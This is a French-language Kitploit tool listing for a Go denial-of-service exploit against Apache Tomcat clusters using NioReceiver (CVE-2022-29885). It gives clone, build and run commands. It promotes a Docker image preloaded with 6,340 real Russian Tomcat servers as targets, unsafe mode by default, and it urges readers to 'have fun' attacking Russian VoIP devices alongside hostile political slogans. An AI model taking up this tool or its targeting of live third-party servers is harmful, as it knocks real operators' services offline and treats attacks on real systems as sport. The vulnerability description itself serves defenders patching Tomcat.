Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-29885 — Exploit Apache Tomcat DoS (CVE-2022-29885) | Kitploit
Outils/GitHubGitHub/iveresk/cve-2022-29885
Analyse des VulnérabilitésExploitationSécurité WebTests d'Intrusion
GitHubiveresk/cve-2022-29885

CVE-2022-29885

Exploit Apache Tomcat DoS (CVE-2022-29885)

Voir le dépôt
42il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-29885 par 1vere$k

Apache Tomcat DoS (CVE-2022-29885) Exploit.
Déni de service dans EncryptInterceptor (Cluster Tomcat).

La machine cible doit démarrer le Cluster Nio Receiver.
L'envoi d'un paquet TCP spécial provoquera un déni de service sur la cible.
Que EncryptInterceptor soit utilisé ou non, il existe une possibilité de vulnérabilité de déni de service sous condition :
la fonction cluster Tomcat est activée et utilise NioReceiver pour la communication.

Toute version de Tomcat sera affectée. La seule solution est d'utiliser un réseau de confiance.

Le fichier de configuration sécurisé server.xml contient

root@kitploit:~
<Interceptor className="org.apache.catalina.tribes.group.interceptors.EncryptInterceptor"
       encryptionAlgorithm="AES/CBC/PKCS5Padding"
       encryptionKey="ANY_KEY(LENGTH:32)"/>

Toute autre variante de configuration n'est pas sécurisée.

Utilisation

Application

root@kitploit:~
1. git clone https://github.com/iveresk/CVE-2022-29885.git
2. cd CVE-2022-29885
3. go build -o /cve-2022-29885
4. ./cve-2022-29885 -t <target_url or file_name> [OPTIONAL] -s false -d false

- t - URL ou nom de fichier cible
- d - indicateur debug {true, false} qui active ou désactive les journaux
- s - commutateur de régime sûr et non sûr. La valeur par défaut est unsafe.

Docker avec 6340 serveurs Apache Tomcat ruzzian prédéfinis multipliés pour les 10 ports Tomcat les plus courants.
Le mode Unsafe par défaut est préconfiguré.

root@kitploit:~
docker run -d masterroot/cve-2022-29885

Amusez-vous avec les appareils VoIP ruzzland-terrorist-state :D

VA TE FAIRE FOUTRE, NAVIRE DE GUERRE RUSSE !

Russian Warship Go F*ck Yourself

Contact

Vous êtes libre de me contacter via Keybase pour tout détail.

Télécharger l’outil